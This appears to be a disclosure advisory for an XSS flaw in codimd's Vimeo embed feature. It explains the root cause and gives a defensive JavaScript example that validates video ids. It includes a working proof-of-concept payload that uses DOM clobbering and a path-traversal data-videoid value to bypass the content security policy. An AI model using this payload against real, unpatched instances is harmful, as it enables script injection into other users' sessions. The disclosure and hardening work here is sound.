codimd
XSS Vulnerability in Embedding Vimeo Video Feature
This issue has been reported to HackMD and has been patched on hackmd.io.
Root Cause
The code doesn't validate the data-videoid attribute at all; it concatenates the value directly into the JSONP URL. Because of this, an attacker can make the page load an arbitrary file under https://vimeo.com as JavaScript, which can lead to XSS.
https://github.com/hackmdio/codimd/blob/e7a5ea813ab684f5c9569dcee3423dd9c442b9bd/public/js/extra.js#L318-L329
PoC
Step 1. Create a note whose content is alert(document.domain);
Step 2. Create a note with the following content:
<!-- DOM clobbering + CSP Bypass -->
<img src="/<note-id-created-in-step-1>/download" id="_zxcvbnSettings">
<!-- load gadget -->
<div class="vimeo raw" data-videoid="../../../blog/wp-includes/js/zxcvbn-async.js#"></div>
Step 3. View it and trigger the XSS!
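The input check the root-cause section calls for, as an added example that is not codimd's own code: the video id is allow-listed as digits before it reaches the JSONP URL, and a small resolver shows why the data-videoid value from the PoC above escapes the API path under raw concatenation. The endpoint shape https://vimeo.com/api/v2/video/<id>.json and all function names are assumptions.

```javascript
// Added example, not code from codimd. Assumed JSONP endpoint shape:
// https://vimeo.com/api/v2/video/<id>.json?callback=<fn>
const VIMEO_API_BASE = 'https://vimeo.com/api/v2/video/';

// Vimeo video ids are numeric; allow-list exactly that and nothing else.
const VIMEO_ID_RE = /^[0-9]{1,20}$/;

function isValidVimeoId(videoid) {
  return typeof videoid === 'string' && VIMEO_ID_RE.test(videoid);
}

// Hardened form: refuse to build a URL for anything that is not a numeric id,
// so the attribute can never steer the request to another path on vimeo.com.
function buildVimeoJsonpUrl(videoid) {
  if (!isValidVimeoId(videoid)) return null;
  return `${VIMEO_API_BASE}${videoid}.json?callback=cb`;
}

// Vulnerable pattern from the root-cause section: raw concatenation. Returns
// the path the browser would actually request after dot-segment resolution,
// which is how "../" in data-videoid leaves /api/v2/video/ entirely.
function pathRequestedByRawConcat(videoid) {
  return new URL(VIMEO_API_BASE + videoid + '.json').pathname;
}

// Constructed inputs: a well-formed id and the data-videoid value from the PoC above.
const SAMPLE_IDS = {
  legit: '123456789',
  traversal: '../../../blog/wp-includes/js/zxcvbn-async.js#',
};

for (const [name, id] of Object.entries(SAMPLE_IDS)) {
  console.log(
    `${name}: hardened -> ${buildVimeoJsonpUrl(id)} | raw concat path -> ${pathRequestedByRawConcat(id)}`
  );
}
```

The hardened builder returns null for the PoC value, while the raw-concatenation path shows it resolving outside /api/v2/video/.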
Technical Detail (Chinese): https://blog.splitline.tw/hackmd-xss/